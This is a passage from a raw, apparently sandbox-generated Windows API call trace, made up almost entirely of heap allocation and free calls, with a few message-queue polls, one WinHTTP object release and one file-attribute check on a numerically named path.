hHeap=0xc60000) returned 1 [0254.654] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26758 | out: hHeap=0xc60000) returned 1 [0254.654] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a358 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837b8 | out: hHeap=0xc60000) returned 1 [0254.655] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b0d8 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc29d8 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1938 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b08 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d78 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1968 | out: hHeap=0xc60000) returned 1 [0254.655] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e050 | out: hHeap=0xc60000) returned 1 [0254.655] WinHttpRequest:IUnknown:Release (This=0xca3298) returned 0x0 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b120 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f40 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e258 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b88 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ce8 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79be0 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79c40 | out: hHeap=0xc60000) returned 1 [0254.656] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79df0 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d90 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79da8 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b048 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f350 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6f0 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b50 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e190 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1948 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e078 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeeae60 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe266c8 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a370 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a610 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83790 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26738 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83308 | out: hHeap=0xc60000) returned 1 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dc0 | out: hHeap=0xc60000) returned 1 [0254.657] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.657] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26738 [0254.657] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.657] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dc0 [0254.657] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe266c8 [0254.657] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b50 [0254.657] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe266c8 | out: hHeap=0xc60000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x16) returned 0xd824d0 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe266c8 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6f0 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26718 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83790 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26758 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x44) returned 0xe86c78 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4c) returned 0xe6e9e8 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe836c8 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe266f8 [0254.658] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83510 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd79ad8 [0254.658] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83790 | out: hHeap=0xc60000) returned 1 [0254.658] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26758 | out: hHeap=0xc60000) returned 1 [0254.658] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6f0 | out: hHeap=0xc60000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83790 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6f0 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26758 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.658] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe834c0 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79e08 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26768 [0254.658] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0254.658] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79da8 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26708 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79d90 [0254.659] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79df0 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe266d8 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a708 [0254.659] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79c40 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26748 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79be0 [0254.659] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ce8 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26778 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0254.659] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26788 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f40 [0254.659] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a120 [0254.659] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26798 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f88 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a960 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267a8 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9b048 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26728 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267b8 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26728 | out: hHeap=0xc60000) returned 1 [0254.660] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6f0 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26758 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79e08 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26768 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79da8 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79d90 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26708 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79df0 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a708 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe266d8 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79c40 | out: hHeap=0xc60000) returned 1 [0254.660] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79be0 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26748 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ce8 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26778 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f40 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26788 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a120 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f88 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26798 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a960 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267a8 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267b8 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b048 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83790 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26718 | out: hHeap=0xc60000) returned 1 [0254.661] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79b50 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dc0 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83308 | out: hHeap=0xc60000) returned 1 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26738 | out: hHeap=0xc60000) returned 1 [0254.661] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.661] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dc0 [0254.661] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26738 [0254.661] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dc0 | out: hHeap=0xc60000) returned 1 [0254.661] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83790 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dc0 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79b50 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0254.662] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26718 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267b8 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe834c0 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267a8 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26798 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd82430 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26788 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f350 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc2950 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f350 | out: hHeap=0xc60000) returned 1 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.662] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd82430 | out: hHeap=0xc60000) returned 1 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26798 | out: hHeap=0xc60000) returned 1 [0254.662] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267a8 | out: hHeap=0xc60000) returned 1 [0254.662] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370")) returned 0x20 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc2950 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26788 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834c0 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267b8 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26718 | out: hHeap=0xc60000) returned 1 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xeb4ee8 [0254.663] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeb4ee8 | out: hHeap=0xc60000) returned 1 [0254.663] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe834c0 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26718 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79ad8 | out: hHeap=0xc60000) returned 1 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe82a20 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267b8 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.663] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267b8 | out: hHeap=0xc60000) returned 1 [0254.663] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.663] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe831c8 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267b8 [0254.664] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83380 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26788 [0254.664] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.664] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26788 | out: hHeap=0xc60000) returned 1 [0254.664] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe830d8 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26788 [0254.664] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe82a48 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe267a8 [0254.664] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.664] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe267a8 | out: hHeap=0xc60000) returned 1 [0254.664] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83128 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0254.664] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe267a8 [0254.664] HeapFree 